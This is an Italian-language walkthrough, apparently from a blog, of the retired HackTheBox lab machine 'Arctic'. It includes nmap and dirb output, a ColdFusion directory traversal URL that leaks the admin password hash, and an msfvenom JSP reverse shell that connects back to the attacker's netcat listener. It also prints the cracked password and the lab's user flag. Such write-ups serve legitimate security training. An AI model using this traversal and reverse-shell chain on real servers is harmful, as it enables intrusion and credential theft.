HTB – Arctic {retired}

Directory traversal

Con nmap effettuiamo una scansione delle porte e dei servizi aperti; la sintassi è sudo nmap -sV -sT -O -A -p- <INDIRIZZO IP> dove:
-sV indicano un SCTP INIT scan,
-sT indicano un TCP connect scan,
-O indica il riconoscimento del Sistema Operativo,
-A indica una scansione “invasiva”,
-p- indica la scansione di tutte le porte.

La scansione con nmap rivela aperte le seguenti porte:
135 – msrpc,
8500 – fmtp,
49154 – msrpc.

kali@kali:~$ sudo nmap -sV -sT -O -A -p- 10.10.10.11
[sudo] password di kali: 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-12 06:58 CEST
Stats: 0:04:06 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 95.83% done; ETC: 07:02 (0:00:00 remaining)
Nmap scan report for 10.10.10.11
Host is up (0.052s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:window

Proviamo ad usare dirb per effettuare uno spidering della porta :8500; ma le risposte sono così lente da farci desistere, proviamo quindi a puntare direttamente il browser alla porta sopra indicata trovando due directory. Navigando la directory /cfide troviamo un ulteriore elenco di directory tra le quali administrator. Procediamo ulteriormente con administrator e troviamo una pagina di login.
La login fa riferimento ad una installazione di ColdFusion.

Tramite dirb ed il Dizionario dedicato alle vulnerabilità di Coldfusion effettuiamo una ricerca di possibili file degni di attenzione con il comando dirb http://10.10.10.11:8500 /usr/share/dirb/wordlists/vulns/coldfusion.txt.

kali@kali:~$ dirb http://10.10.10.11:8500 /usr/share/dirb/wordlists/vulns/coldfusion.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Jun 12 16:33:11 2020
URL_BASE: http://10.10.10.11:8500/
WORDLIST_FILES: /usr/share/dirb/wordlists/vulns/coldfusion.txt

-----------------

GENERATED WORDS: 22                                                            

---- Scanning URL: http://10.10.10.11:8500/ ----
==> DIRECTORY: http://10.10.10.11:8500/CFIDE/                                                                                                                                 
==> DIRECTORY: http://10.10.10.11:8500/CFIDE/administrator/                                                                                                                   
+ http://10.10.10.11:8500/CFIDE/administrator/aboutcf.cfm (CODE:200|SIZE:9281)                                                                                                
+ http://10.10.10.11:8500/CFIDE/administrator/Application.cfm (CODE:500|SIZE:5420)                                                                                            
+ http://10.10.10.11:8500/CFIDE/administrator/checkfile.cfm (CODE:200|SIZE:9283)                                                                                              
+ http://10.10.10.11:8500/CFIDE/administrator/enter.cfm (CODE:200|SIZE:9279)                                                                                                  
+ http://10.10.10.11:8500/CFIDE/administrator/header.cfm (CODE:200|SIZE:9280)                                                                                                 
+ http://10.10.10.11:8500/CFIDE/administrator/homepage.cfm (CODE:200|SIZE:9282)                                                                                               
+ http://10.10.10.11:8500/CFIDE/administrator/index.cfm (CODE:200|SIZE:9279)                                                                                                  
+ http://10.10.10.11:8500/CFIDE/administrator/linkdirect.cfm (CODE:200|SIZE:9284)                                                                                             
+ http://10.10.10.11:8500/CFIDE/administrator/login.cfm (CODE:200|SIZE:9279)                                                                                                  
+ http://10.10.10.11:8500/CFIDE/administrator/logout.cfm (CODE:200|SIZE:9280)                                                                                                 
+ http://10.10.10.11:8500/CFIDE/administrator/navserver.cfm (CODE:200|SIZE:9283)                                                                                              
                                                                                                                                                                              
---- Entering directory: http://10.10.10.11:8500/CFIDE/ ----
+ http://10.10.10.11:8500/CFIDE/CFIDE/administrator/Application.cfm (CODE:500|SIZE:5420)                                                                                      
                                                                                                                                                                              
---- Entering directory: http://10.10.10.11:8500/CFIDE/administrator/ ----
+ http://10.10.10.11:8500/CFIDE/administrator/CFIDE/administrator/Application.cfm (CODE:500|SIZE:5420)                                                                        
                                                                               lcomegetstart.cfm  

Avuta la conferma che si tratta di una installazione di Coldfusion cerchiamo in Exploit Database alla ricerca di vulnerabilità e ci soffermiamo su Adobe ColdFusion – Directory Traversal (Metasploit).
Nella descrizione troviamo un riferimento a come comporre l’url del sito per ottenere la visualizzazione di file altrimenti non accessibili:
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../../../../../../../../../../../../../Coldfusion8/lib/password.properties%00en
La ricerca ci frutta un hash 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 che risolviamo con crackstation in happyday.

Effettuiamo login con le credenziali appena trovate.

Accediamo alla funzione di Scheduled Tasks e predisponiamo una reverse shell in Java con msfvenom con la sintassi msfvenom -p payload LHOST=<IP MACCHINA KALI> LPORT=<PORTA MACCHINA KALI> -f <FORMATO> > <FILE DI OUTPUT>.

kali@kali:~/Documenti/HTB/Arctic$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.4 LPORT=4453 -f raw > shell.jsp
Payload size: 1496 bytes
kali@kali:~/Documenti/HTB/Arctic$

Accediamo alla funzionalità Debugging & Logging –> Scheduled Tasks.


Tramite la funzionalità uplodiamo il payload creato tramite msfvenom valorizzando i campi:
Task Name – un nome a piacere,
URL – l’URL della macchina target comprensivo del nome del payload,
User Name – admin,
Password – la password di admin,
Publish – selezionato,
Resolve url – l’indirizzo da cui eseguire il payload.

Mettiamo netcat in ascolto sulla porta indicata nel payload ed eseguiamo il task dalla console di Cold Fusion ottenendo una shell.

kali@kali:~/Documenti/HTB/Arctic$ ls -al
totale 12
drwxr-xr-x  2 kali kali 4096 giu 12 17:23 .
drwxr-xr-x 10 kali kali 4096 giu 12 17:13 ..
-rw-r--r--  1 kali kali 1496 giu 12 17:23 l4sh3r.jsp
kali@kali:~/Documenti/HTB/Arctic$ nc -lvp 4501
listening on [any] 4501 ...
10.10.10.11: inverse host lookup failed: Unknown host
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.11] 51403
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>

Navighiamo nella directory di tolis per ottenere la prima flag:
02650d3a69a70780c302e146a6cb96f3

C:\Users\tolis>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is F88F-4EA5

 Directory of C:\Users\tolis

22/03/2017  10:00 ��    <DIR>          .
22/03/2017  10:00 ��    <DIR>          ..
22/03/2017  10:00 ��    <DIR>          Contacts
22/03/2017  10:00 ��    <DIR>          Desktop
22/03/2017  10:00 ��    <DIR>          Documents
22/03/2017  10:00 ��    <DIR>          Downloads
22/03/2017  10:00 ��    <DIR>          Favorites
22/03/2017  10:00 ��    <DIR>          Links
22/03/2017  10:00 ��    <DIR>          Music
22/03/2017  10:00 ��    <DIR>          Pictures
22/03/2017  10:00 ��    <DIR>          Saved Games
22/03/2017  10:00 ��    <DIR>          Searches
22/03/2017  10:00 ��    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  33.183.944.704 bytes free

C:\Users\tolis>cd Desktop
cd Desktop

C:\Users\tolis\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is F88F-4EA5

 Directory of C:\Users\tolis\Desktop

22/03/2017  10:00 ��    <DIR>          .
22/03/2017  10:00 ��    <DIR>          ..
22/03/2017  10:01 ��                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  33.183.944.704 bytes free

C:\Users\tolis\Desktop>type user.txt
type user.txt
02650d3a69a70780c302e146a6cb96f3

Leave a Reply

Your email address will not be published. Required fields are marked *